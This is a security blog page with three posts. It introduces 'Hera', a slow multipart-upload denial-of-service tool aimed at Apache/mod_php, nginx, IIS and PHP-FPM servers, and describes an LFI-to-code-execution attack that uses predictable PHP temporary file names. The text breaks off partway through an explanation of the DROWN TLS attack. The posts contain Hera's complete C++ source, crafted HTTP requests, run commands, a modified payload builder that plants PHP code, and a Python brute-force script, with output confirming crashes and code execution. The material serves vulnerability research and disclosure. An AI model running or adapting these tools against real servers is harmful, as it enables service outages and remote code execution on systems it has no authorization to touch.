Denial of service – Evil is an art form

Introduction

This article was originally planned to be a part of a larger project where a presentation at the developer conference Öredev was the second part. However, the presentation at Öredev got cancelled (I have stage fright so I don’t mind really). I have decided to put more energy into the writing part of this little project, do more tests and try to present some more interesting results.

The idea started with “People are so creative at messing up servers these days. I wanna do that”. And it ended in just that. People involved in some projects affected by this method have stated that they are either not vulnerable or that this attack is not dangerous and should not be considered a vulnerability. Some of these statements will be covered further down in the text. The first idea was born several years ago when I wrote a script called “Tsunami”, that simply bombs a server with file uploads. Not very efficient and I later abandoned the project as I could not get any interesting results out of it. The project was brought back to life not too long ago, and the very simple Tsunami script served as a base for the new Hera tool that will be described below.

TL;DR

By uploading a large amount of files to different server setups, and not finishing the upload (utilizing slow attack methods), one can get one or several of the following effects:

  • Make server unresponsive or respond with an internal server error message
  • Fill disk space resulting in different effects depending on server setup
  • Use up RAM and crash whole server

Basically it depends on the huge amount of temporary files being saved on the disk, the massive amount of file handlers being opened or if the data is stored in RAM instead of the disk. How the different results above are reached depends heavily on what type of server is used and how it is set up. The following setups were tested and will be covered in this article.

  • Windows Server with Apache
  • Windows Server with IIS 7
  • Linux server with Apache
  • Linux server with Nginx

It should be noted that some of theses effects are similar or identical to that of other attacks such as Slowloris or Slowpost. The difference is that some servers will handle file uploads differently and sometimes rather badly. This of course has different effects depending on the setup.

So here’s the thing

The original Tsunami script simply flooded a server with file uploads. The end result on a very low end machine was that the space ran out on the machine, eventually. But it was so extremely inefficient that it was not worth continuing the project. So this time I needed to figure out a way to keep the server from removing the files. For my initial testing when developing the tool I used an Apache with mod_php in Linux. Most settings were default apart from a few modifications to make the server allow more requests and in some cases be more stable, which you will see later on in this article when I list all the server results.

Now the interesting part about uploading a file to a server is that it has to store the data somewhere while the upload is being performed. Storing in RAM is usually very inefficient since it could lead to memory exhaustion very quickly (although some still do this, as you will see later in the results). Some will store the data in temporary files, which seems more reasonable. And in the case with mod_php, the data will be uploaded and stored in a temporary file before the data gets to your script/application. This was the first important thing I learned that made this slightly more exiting for me. Because this means that as long as we have access to a PHP script on a server, any script, we can upload a file and store it temporarily. Of course the file will be removed when the script has finished running, which was the case with the Tsunami script (I made a script that ran very slowly, to test this out. Didn’t get very promising results either way).

The code responsible for the upload can be found here.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c

The RFC in question for reference
https://www.ietf.org/rfc/rfc1867.txt

This part is interesting, since I needed to make sure what the default settings was for file uploads. If the default was set to not allow file uploads, then this attack would be slightly less interesting.

/* If file_uploads=off, skip the file part */
if (!PG(file_uploads)) {
	skip_upload = 1;
} else if (upload_cnt <= 0) {
	skip_upload = 1;
	sapi_module.sapi_error(E_WARNING, "Maximum number of allowable file uploads has been exceeded");
}

Luckily it was set to on as default.
This means that given any standard Apache installation with mod_php enabled and at least one known PHP script reachable from the outside, this attack could be performed.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/main.c#L571

STD_PHP_INI_BOOLEAN("file_uploads",			"1",		PHP_INI_SYSTEM,		OnUpdateBool,			file_uploads,			php_core_globals,	core_globals)

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-development#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

As seen here, the file is uploaded to a temporary folder (normally /tmp on Linux) with a “php” prefix.
https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/rfc1867.c#L1021

if (!cancel_upload) {
	/* only bother to open temp file if we have data */
	blen = multipart_buffer_read(mbuff, buff, sizeof(buff), &end);
#if DEBUG_FILE_UPLOAD
	if (blen > 0) {
#else
	/* in non-debug mode we have no problem with 0-length files */
	{
#endif
		fd = php_open_temporary_fd_ex(PG(upload_tmp_dir), "php", &temp_filename, 1);
		upload_cnt--;
		if (fd == -1) {
			sapi_module.sapi_error(E_WARNING, "File upload error - unable to create a temporary file");
			cancel_upload = UPLOAD_ERROR_E;
		}
	}
}

Checking a more recent version of PHP yields the same result.
Below is the latest commit as of 2016-10-20.

https://github.com/php/php-src/blob/49412756df244d94a217853395d15e96cb60e18f/php.ini-production#L815

;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;

; Whether to allow HTTP file uploads.
; http://php.net/file-uploads
file_uploads = On

So now that I have confirmed the default settings in PHP, I can start experimenting with uploading files. A simple Apache installation on a Debian machine with mod_php enabled, and a test.php under /var/www/ should be enough. The test.php could theoretically be empty and this should work either way. Uploading a file is easy enough. Create a simple form in a html file and submit it with a file selected. Nothing new there. The file will get saved in /tmp and the information about the file will be passed on to test.php when it is called. Whether test.php does something with the file is irrelevant, it will still be deleted from /tmp once the script has finished. But we want it to stay in the /tmp folder for as long as possible.

After playing around in Burp for a while, I came to think about how Slowloris keeps a connection alive by sending headers very slowly, making the server prolong the timeout period for (sometimes) as long as the client want. What if we could send a large file to the server and then not finish it, and have the server think we want to finish the upload by sending one byte at a time with very long intervals?

Sure enough, by setting a content-length header larger than the actual data we have uploaded, we can keep the file in /tmp for a long period as long as we send some data once in a while (depends on the timeout settings). The original content-length of the below request was 16881, but I set it to 168810 to make the server wait for the rest of the data.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

If we check /tmp we can see that the file is indeed there

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/php5Ylw1J
jimmy@Enma /tmp $ cat /tmp/php5Ylw1J
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.....

The default settings allows us to upload a total of 20 files in the same request, with a max POST size of 8MB. This makes the attack more useful as we can open 20 file descriptors now instead of just 1 as I assumed before. In this first test I didn’t send any data after the first chunk, thus the files were removed when the request timed out. But all files sent were there during the duration of the request.

POST /test.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------1825653778175343117546207648
Content-Length: 168810

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

-----------------------------1825653778175343117546207648
Content-Disposition: form-data; name="file"; filename="data.txt"
Content-Type: text/plain

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
......

Again, all files are saved as separate files in /tmp

jimmy@Enma /tmp $ ls /tmp/php*
/tmp/phpmESJII  /tmp/phpQiDlOC  /tmp/phps2zxLa

Okay fine, so it works. Now what?

Well now that I can persist a number of files on the target system for the duration of the request (which I can prolong via a slow http attack method), I need to write a tool that can utilize this to attack the target system with. This is how the Hera tool was born (don’t put too much thought into the name, it made sense at first when a friend suggested it, but we can’t remember why).

https://github.com/jra89/Hera

#define _GLIBCXX_USE_CXX11_ABI 0

#include <string.h>
#include <sstream>
#include <iostream>
#include <iomanip>
#include <thread>
#include <vector>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <csignal>
#include <ctime>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <arpa/inet.h>

using namespace std;

/*
~=Compile=~
g++ -std=c++11 -pthread main.cpp -o hera -lz

~=Run=~
./hera 192.168.0.209 80 5000 3 /test.php 0.03 20 0 0 20

~=Params=~
./hera host port threads connections path filesize files endfile gzip timeout 

~=Increase maximum file descriptors=~
vim /etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

~=Increase buffer size for larger attacks=~

*/

string getTime()
{
    auto t = time(nullptr);
    auto tm = *localtime(&t);
    ostringstream out;
    out << put_time(&tm, "%Y-%m-%d %H:%M:%S");
    return out.str();
}

void print(string msg, bool mood)
{
    string datetime = getTime();
    if(mood)
    {
        cout << "[+][" << datetime << "] " << msg << endl;
    }
    else
    {
        cout << "[-][" << datetime << "] " << msg << endl;
    }
}

void *get_in_addr(struct sockaddr *sa)
{
    if (sa->sa_family == AF_INET) {
        return &(((struct sockaddr_in*)sa)->sin_addr);
    }

    return &(((struct sockaddr_in6*)sa)->sin6_addr);
}

int doConnect(string *payload, string *host, string *port)
{
    int sockfd;
    struct addrinfo hints, *servinfo, *p = NULL;
    int rv, val;
    char s[INET6_ADDRSTRLEN];

    memset(&hints, 0, sizeof hints);
    hints.ai_family = AF_UNSPEC;
    hints.ai_socktype = SOCK_STREAM;


    if ((rv = getaddrinfo(host->c_str(), port->c_str(), &hints, &servinfo)) != 0) 
    {
        print("Unable to get host information", false);
    }


    while(!p)
    {
        for(p = servinfo; p != NULL; p = p->ai_next) 
        {
            if ((sockfd = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) 
            {
                print("Unable to create socket", false);
                continue;
            }

            if (connect(sockfd, p->ai_addr, p->ai_addrlen) == -1) 
            {
                close(sockfd);
                print("Unable to connect", false);
                continue;
            }

            //connected = true;
            break;
        }
    }

    int failures = 0;
    while(send(sockfd, payload->c_str(), payload->size(), MSG_NOSIGNAL) < 0)
    {
        if(++failures == 5)
        {
            close(sockfd);
            return -1;
        }
    }

    freeaddrinfo(servinfo);
    return sockfd;

}

void attacker(string *payload, string *host, string *port, int numConns, bool gzip, int timeout)
{
    int sockfd[numConns];
    fill_n(sockfd, numConns, 0);
    string data = "a\n";

    while(true)
    {
        for(int i = 0; i < numConns; ++i)
        {
            if(sockfd[i] <= 0)
            {
                sockfd[i] = doConnect(payload, host, port);
            }
        }
        
        for(int i = 0; i < numConns; ++i)
        {
            if(send(sockfd[i], data.c_str(), data.size(), MSG_NOSIGNAL) < 0)
    	    {
                close(sockfd[i]);
                sockfd[i] = doConnect(payload, host, port);
    	    }
        }

        sleep(timeout);
    }

     
}

string gen_random(int len) 
{
    char alphanum[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    int alphaLen = sizeof(alphanum) - 1;
    string str = "";

    for(int i = 0; i < len; ++i)
    {
        str += alphanum[rand() % alphaLen];
    }

    return str;
}

string buildPayload(string host, string path, float fileSize, int numFiles, bool endFile, bool gzip)
{
    ostringstream payload;
    ostringstream body;
    int extraContent = (endFile) ? 0 : 100000;

    //Build the body
    for(int i = 0; i < numFiles; ++i)
    {
	body << "-----------------------------424199281147285211419178285\r\n";
	body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
	body << "Content-Type: text/plain\r\n\r\n";

    	for(int n = 0; n < (int)(fileSize*100000); ++n)
    	{
    	    body << "aaaaaaaaa\n";
    	}
    }

    //If we want to end the stream of files, add ending boundary
    if(endFile)
    {
        body << "-----------------------------424199281147285211419178285--";
    }
	
    //Build headers
    payload << "POST " << path.c_str() << " HTTP/1.1\r\n";
    payload << "Host: " << host.c_str() << "\r\n";
    payload << "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\r\n";
    payload << "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    payload << "Accept-Language: en-US,en;q=0.5\r\n";
    payload << "Accept-Encoding: gzip, deflate\r\n";
    payload << "Cache-Control: max-age=0\r\n";
    payload << "Connection: keep-alive\r\n";
    payload << "Content-Type: multipart/form-data; boundary=---------------------------424199281147285211419178285\r\n";
    payload << "Content-Length: " << body.str().size()+extraContent << "\r\n\r\n";
    payload << body.str() << "\r\n";
    
    return payload.str();
}

void help()
{
    string help = 
    "./hera host port threads connections path filesize files endfile gzip timeout\n\n"
    "host\t\tHost to attack\n"
    "port\t\tPort to connect to\n"
    "threads\t\tNumber of threads to start\n"
    "connections\tConnections per thread\n"
    "path\t\tPath to post data to\n"
    "filesize\tSize per file in MB\n"
    "files\t\tNumber of files per request (Min 1)\n"
    "endfile\t\tEnd the last file in the request (0/1)\n"
    "gzip\t\tEnable or disable gzip compression\n";
    "timeout\t\nTimeout between sending of continuation data (to keep connection alive)\n";

    cout << help;
}

int main(int argc, char *argv[])
{
    cout << "~=Hera 0.7=~\n\n";
    
    if(argc < 10)
    {
        help();
        exit(0);
    }

    string host = argv[1];
    string port = argv[2];
    int numThreads = atoi(argv[3]);
    int numConns = atoi(argv[4]);
    string path = argv[5];
    float fileSize = stof(argv[6]);
    int numFiles = atoi(argv[7]) > 0 ? atoi(argv[7]) : 2;
    bool endFile = atoi(argv[8]) == 1 ? true : false;
    bool gzip = atoi(argv[9]) == 1 ? true : false;
    float timeout = stof(argv[10]) < 0.1 ? 0.1 : stof(argv[10]);
    vector<thread> threadVector;

    print("Building payload", true);
    srand(time(0));
    string payload = buildPayload(host, path, fileSize, numFiles, endFile, gzip);
    //cout << payload << endl;
	
    print("Starting threads", true);
    for(int i = 0; i < numThreads; ++i)
    {
    	threadVector.push_back(thread(attacker, &payload, &host, &port, numConns, gzip, timeout));
        sleep(0.1);
    }

    for(int i = 0; i < numThreads; ++i)
    {
    	threadVector[i].join();
    }
}

The version above is an older one and if you want to test out the tool I recommend that you clone the repository from github (which is linked above). The newest version has support for gzip. However the gzip experiment did not produce the results I expected. Therefore support for sending gzip compressed data with the tool will be removed in the future. The tool compiles and works just fine as it is right now though. As the idea is to open a ton of connections to a target server, it is essential that you increase the amount of file descriptors that you can use in the system. This is usually set to something around 1024 or such. And the limit I have set in the example below can be anything, as long as you don’t reach the limit because then the test might fail.

/etc/security/limits.conf

* soft nofile 65000
* hard nofile 65000
root soft nofile 65000
root hard nofile 65000

This is also covered in the readme on github that I linked earlier.

Okay so how does this affect different servers?

Together with a colleague (Stefan Ivarsson), a number of tests were made and documented to test the effects this will have on different systems. The effects differs quite a bit, and if you want to make sure if this works on your own setup or not the best way would be to simply test it in a safe environment (Like a test server that is separated from your production environment).

Setup 1
Operating system: Debian (Jessie, VirtualBox)
Web server: Apache (2.4.10)
Scripting module: mod_php (PHP 5.6.19-0+deb8u1)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 2GB
CPU Core: 1
HDD: 8GB

So basically what this meant for the test was that I could set my tool to send 20 files per request with a max size of 0.4 MB, but to give some margin for headers and such, I set it to 0.3 per file. There are two different ways that I wanted to test this attack. The first one is to send as large files as possible, which would fill up disk space and hopefully disrupt services as the machine ran out of space. The second way was to send as many small files as possible and make the server stressed by opening too many file handles. As it turns out, both methods are good for different servers and setup and will prove fatal for the server depending on certain factors (setup, ram, bandwidth, space etc).

So during the test with the above setup, I set the Hera tool to attack using 2500 threads and 2 sockets per thread. There were 20 files per request and each file was set to 0.3MB. This is 30GB worth of data being sent to the server, so if it doesn’t dispose of that information it will have to save it on either disk or in RAM, both not being enough. What happened was rather expected actually.

It should be noted that the default Apache installation allowed very few connections to be open, leading to a normal Slowloris effect. This is not what I was after and so I configured the server to allow more connections (each thread is about 1MB with this setup making it very inefficient, but don’t worry there are more test results further down). The server ran out of memory because of too many spawned Apache processes.

apacheoutofmemory

When the RAM was raised the space eventually ran out on the server.

nomorespace

As expected the number of files in the tmp folder exploded and kept the server CPU usage up during the whole time (until the disk space ran out of course in which case no more files could be created).

apachetmpfiles

apachetmpfilescount

During the attack the Apache server was unresponsive from the outside, and when the HDD space ran out it became responsive again.

apachenotreach

An interesting effect here was actually when I decided to halt the attack. This resulted in the CPU going up to 100% since the machine had to kill all the processes and remove all of the files. So I took this chance to immediately start the attack again to see what would happen. It would stay up at 100% CPU and continue its attempt in removing the files and processes while I was forcing it to create new ones at the same time.

restartattack

Setup 2
Operating system: Windows Server 2012 (VirtualBox)
Web server: Apache (WAMP)
Scripting module: mod_php (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test was conducted in a similar manner as the first one. It resulted in Apache being killed because it ate too much memory. The disk space also ran out after a while. The system became very unstable and applications got killed one after another to preserve memory (Firefox and the task manager for example). At first the same effect was reached as the connection pool ran out, but increasing the limit “fixed” that. The mpm_winnt_module was used in the first test. A more robust setup will be presented in a later test.

tempfileswindows

As you can see in the image above, the tmp files are created and persist throughout the test as expected.

pluginservicekilled

The system starts killing processes when the RAM starts running out, so we are still seeing effects similar to that of a normal slowloris attack (that is, the apache processes are taking up a lot of memory for every thread started, this is nothing new).

amountoffiles

diskfullnewedited

But we are still getting our desired effect of a huge amount of files being uploaded and filling up the disk space, so that still works. After increasing the virtual machines RAM to 8GB the Apache server did not get killed during the attack. The server was mostly unresponsive during the attack and by setting the timeout of the tool to very low and the size of the files to very small, the server CPU load could be kept at around 90-100% constantly (Since it was creating and removing thousands of files all the time). At one point the Apache process stopped accepting any connections, even after the attack had stopped. Although this could not be reproduced very easily so I have yet to verify the cause of this. Another interesting effect of the attack was that the memory usage went up to 2.5-3GB and never went down again after the attack had finished (Trying to create a dump of the memory of the Apache process after the attack heavily messed up the machine so I gave up on that for now).

unresponsiveedit

The picture above was taken when the process became unresponsive and stopped accepting connections. Although this cannot be seen in the picture, but instead demonstrates the memory usage several minutes after the attack had stopped.

Setup 3
Operating system: Debian (VirtualBox)
Web server: nginx
Scripting module: PHP-FPM (PHP 5)
Max allowed files per request: 20 (Default)
Max allowed post size: 1 MB (Default)
RAM: 4GB
CPU Core: 1
HDD: 25GB

In this test I tried the same tactic as before. One thing that I immediately noticed was that with a lot of connections and few files per request, the max allowed connections was hit pretty fast (which is not surprising).

workernotenoughedit

connectionresetedited

But, with a lot of small files per request, something more interesting happened instead. It seemed to hit a max file opened limit which instead of a connection refused resulted in a 500 internal server error. Setting a small amount of files but changing the file size to larger appeared to have the same effect however. So this is probably the same effect as a slowpost attack.

nginxtoomanyfiles-edited

nginxinternalservererror

Changing worker_connections in /etc/nginx/ngninx.conf to a higher value mostly fixed the issue with the first problem with opening a lot of slowloris-like connections (small amount of files only). But increasing the amount of files to the maximum (20) per request quickly downed the server again showing only an internal server error message. Changing the size of the data sent also had this effect of course.

A thing I noticed was that nginx does not hand over the data to PHP until the request has finished transmitting. This does not stop the creation of files since nginx needs to create temporary files as well. But it does stop the large amount of files being created as nginx will only create one file per request instead of a maximum of 20 like with mod_php.

Setup 4
Operating system: Windows Server 2012 (VirtualBox)
Web server: IIS 8
Scripting module: ASP.NET
RAM: 4GB
CPU Core: 1
HDD: 25GB

This test ended very similarly to the nginx one. The server saved the data in a single temporary file it seems and did not seem to have a lot of problems with the amount of connections to the server. In the end, when maxing the attack from the test attacking machine, the web server became unresponsive about 8/10 of the times. This was most likely more of a Slowloris/Slowpost type of effect rather than a result of a lot of files being created. More tests could be made on this setup to further investigate methods of bringing the server down, but because of the relatively bad result (compared to the other setups) I decided to leave it at that for now. The server can be stressed no doubt about that, but not in the way that I intended for this experiment.

Setup 5
Operating system: Debian (Amazon EC2, m4.xlarge)
Web server: Apache
Scripting module: PHP-FPM (PHP 7)
Max allowed files per request: 20 (Default)
Max allowed post size: 8 MB (Default)
RAM: 16GB
CPU Core: 1
HDD: 30GB

This test was very special and was the last very big test I wanted to make. The goal of the test was to try the attack method on a large more realistic setup in the cloud. To do this I took the help of Werner Kwiatkowski over at http://rustytub.com who (in exchanged for candy, herring and beverage) helped me to setup a realistic and stable server that could take a punch.

siteoffline

The first problem I had as the attacker, was that the server would only create a single temporary file per request, instead of a maximum of 20 like I was expecting. The second “problem” was that the server became unresponsive in a Slowloris/Slowpost kind of manner instead of being effected by my many uploaded files. This was because Werner had set it up in a way so that the server would rather become unresponsive than to crash catastrophically. This is of course preferred and defeated my tool in a way. So, to get my desired effect I actually had to change the max allowed connections of the server to a lot higher so that I could see the effects of all the files being created. This of course differs from my initial idea of only testing near default setups, but I felt it could be important to have some more realistic samples as well. And yes, I used hackme.biz for the final test.

filecountedited

The amount of files specified above seemed to be the max I could reach. However, after the limit was reached something very interesting happened. The server appeared to store the files that could not be written to temporary files, in memory instead. This made the RAM usage go completely out of control very quickly. It took a while for the attack to actually use up all of that RAM, but after about 30 minutes or so, it had finally managed to fill it all up.

extremeram

The image above was taken about a minute before the server stopped responding and crashed because of memory exhaustion.

ec2status

Logging into the AWS account and checking the EC2 instances makes it more clear that the node has crashed. Now, of course this could still mean that the effects we are seeing are still the effects of a Slowloris attack where the processes created are the ones using up all the memory. So to test that I did the same test with a Slowloris attack tool with this setup. The result was actually not that impressive even when I tried using more connections than with the Hera tool.

notsoextremeram

As you can see the memory usage for the same amount of threads/connections used is not even close. That is because this particular setup is not vulnerable to the normal Slowloris attack, nor is it vulnerable to Slowpost (I did not try Slowread and other slow attacks).

php-fpm-files-ram

This time dumping memory was a lot easier so I could check if the data was still stored in memory even after the attack was in idle mode (As in, it was not currently transmitting a lot of data and was simply waiting for the timeout to occur). The data from the payload could be found in the process memory which explains why the RAM usage went out of control like it did. I have not investigated this any further though.

So, in summary

I would like to think that this method could be used for some pretty bad stuff. It’s not an entirely new attack method but rather a new way of performing slow attacks against servers that handles file uploads in a bad way. Not all of the setups were vulnerable to this method, but most of them were either vulnerable to this method or they were vulnerable to other slow attacks which became apparent during the test (For example slowpost on nginx setups).

This method can be used in other ways than crashing servers. It can be used in an attack to guess temporary file names when you only have a file inclusion vulnerability at your disposal. You can read the start of that project here.

When I started playing around with this method I contacted Apache, PHP and Redhat to see what they had to say about it. Apache said it does not directly affect them (which is true since in the case of mod_php that is in the hands of the PHP team). PHP said that it was not a security issue and that file uploads is not turned on by default. If you read the article you will see that this is just not true and I have asked them to clarify on what they mean about that, without getting an answer. Redhat were extremely helpful and even setup a test machine for the tool where they could see the effects. However, they did not deem this a vulnerability and closed the case. I still think it’s an interesting method and I also feel like it should be okay for me to post this now without regretting it later due to breaking any responsible disclosure policies.

Thanks for reading!

Tagged with: , , , , , , ,
Posted in Hacking, Security

Local file inclusion with tmp files

A thing I noticed while writing the Hera tool and doing all the tests, is that some server setups did not have very good randomness in their temporary files. This opens up for some interesting opportunities if you happen to have found a local file inclusion vulnerability in an application.

Imagine the following not very good code in an application

<?php include($_GET['file']); ?>

Looks bad, and I promise this is not that unusual and we find it from time to time during our reviews.

And here are some temporary files that were created in the WAMP test that I did while writing the article for Hera. Notice that the random string after the “php” prefix is rather short and should be easy to predict or brute force.

deterministicfiles

So to test this I modified Hera a bit, or more specifically the payload builder of the tool to include a piece of PHP code at the end of every file uploaded to a server.

.....
    //Build the body 
    for(int i = 0; i < numFiles; ++i)
    {
        body << "-----------------------------424199281147285211419178285\r\n";
        body << "Content-Disposition: form-data; name=\"" << gen_random(10) << "\"; filename=\"" << gen_random(10) << ".txt\"\r\n";
        body << "Content-Type: text/plain\r\n\r\n";

        for(int n = 0; n < (int)(fileSize*100000); ++n)
        {
            body << "aaaaaaaaa\n";
        }

        body << "<?='ThisShouldNotExist';?>\n";
    }
.....

Notice the “ThisShouldNotExist”. If the code gets executed that text will show up on the vulnerable page. Now we need another tool to constantly test including a set of temporary files that we think will show up eventually. I wrote a simple Python script for this.

from urllib import request, parse

def main():

    target = 'http://10.11.12.69/test.php?file=../tmp/'
    tmpFiles = ['php1.tmp', 'php1A00.tmp', 'php1A01.tmp', 'php1A1A.tmp', 'php1A1B.tmp', 'php1A.tmp', 'php1B.tmp']

    while True:
        for tmp in tmpFiles:
            if 'ThisShouldNotExist' in doRequest(target + tmp):
                print("Code executed")
                exit()


def doRequest(target):
    while True:
        try:
            req = request.Request(target)
            resp = request.urlopen(req)
            return resp.read().decode('UTF-8')
        except:
            pass

    return ''

if __name__ == '__main__':
    main()

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker. We are not interested in sending a lot of data to the server this time. Of course this could all be optimized greatly, and right now the Hera tool will uploaded the set of files like normal. A more optimal solution would be to have Hera upload a set of files, then restart the attack so that a new set of tmp files would be created on the server. Thus raising the chance of our guessed tmp files to be created.

./hera 10.11.12.69 80 100 2 /index.php 0.001 20 0 0 40
~=Hera 0.8=~

[+][2016-10-28 17:23:17] Building payload
[+][2016-10-28 17:23:17] Starting threads

time python3 LocalExecPoC.py
Code executed

real 0m49.778s
user 0m5.528s
sys 0m0.828s

Now, this was on Windows. And the code for creating temporary files in mod_php is different depending on the operating system. The default function for Linux is more secure but could still be used as well (although this would take a lot more time). I will build a proof-of-concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results🙂.

apachetmpfiles

As you can see in the image above the names are more random and also longer on Linux, making this a lot harder to guess the name of. The code below shows some Windows specific code related to the creation of the temporary file. The complete code can be found in the link below.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/php_open_temporary_file.c#L165

#ifdef PHP_WIN32
	cwdw = php_win32_ioutil_any_to_w(new_state.cwd);
	pfxw = php_win32_ioutil_any_to_w(pfx);
	if (!cwdw || !pfxw) {
		free(cwdw);
		free(pfxw);
		efree(new_state.cwd);
		return -1;
	}

if (GetTempFileNameW(cwdw, pfxw, 0, pathw)) {

Linux uses the mkstemp function to create its random strings for the file names. This is pretty secure but not fool proof. As mentioned earlier I will update this article when I have fixed test data for this scenario as well. More to come.

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now and all future results relating to this issue.

Tagged with: , , , ,
Posted in Hacking, Security

DROWN – How the deprecated SSLv2 protocol can compromise modern TLS connections

Last month a serious SSL/TLS vulnerability named “DROWN” – “Decrypting RSA with Obsolete and Weakened eNcryption” – broke the surface. In this article I will explore the mechanics of the attack and why it works. I wanted to have a closer look at DROWN because it is a beautiful hack and a prime example of how the mere existence of deliberately weakened ciphers hurts us still today, years after we’ve deprecated them. But first…

Some practical information

DROWN is a padding oracle attack that enables an attacker to obtain the session keys for, and hence decrypt, a captured TLS session by repeatedly probing the server using the SSLv2 protocol. Use of SSLv2 has long been deprecated by browsers and before DROWN it was believed that supporting SSLv2 was not a big issue since clients would never use it. However, DROWN shows us how merely supporting an outdated protocol like SSLv2 can pose a real threat to more modern protocols.

Is your server vulnerable?

A test for vulnerability, together with the essential practical information, has been published on a dedicated website:

https://drownattack.com/#check
https://drownattack.com/

A server is vulnerable if it supports SSLv2 with export-grade ciphers, or it shares its certificate with a server that does. At the time of disclosure (March 1st), that was 33% of HTTPS servers on the web.

The efforts of the attacker (feasibility)

The attacker has to passively eavesdrop about 1000 TLS connections to a vulnerable server in order to successfully decrypt a victim’s session. The attack requires the attacker to expend, for example, $440 on Amazon EC2 cloud computing platform during 8h of computation, or, in the case of OpenSSL that predates march 4, 2015, less than a minute on a single PC.

Dissecting the vulnerability

Now let’s have a look at what the vulnerability is. I won’t get into the underlying mathematics because they are, of course, quite involved. Here we go…

Decrypting a secure connection

In a secure connection the client and server negotiate secret session keys in order to be able to encrypt all the traffic of their session. This negotiation is called a “handshake”.

The secrecy of these session keys relies on the secrecy of a so-called “pre-master secret” (PMS) which is used by both server and client to derive the same session keys. During the handshake the client generates the PMS and sends it to the server in a message called “ClientKeyExchange” which is encrypted using the server’s public key.

So the problem for an eavesdropping attacker is to get the plain-text PMS from the encrypted “ClientKeyExchange” message.

Bleichenbacher’s Oracle

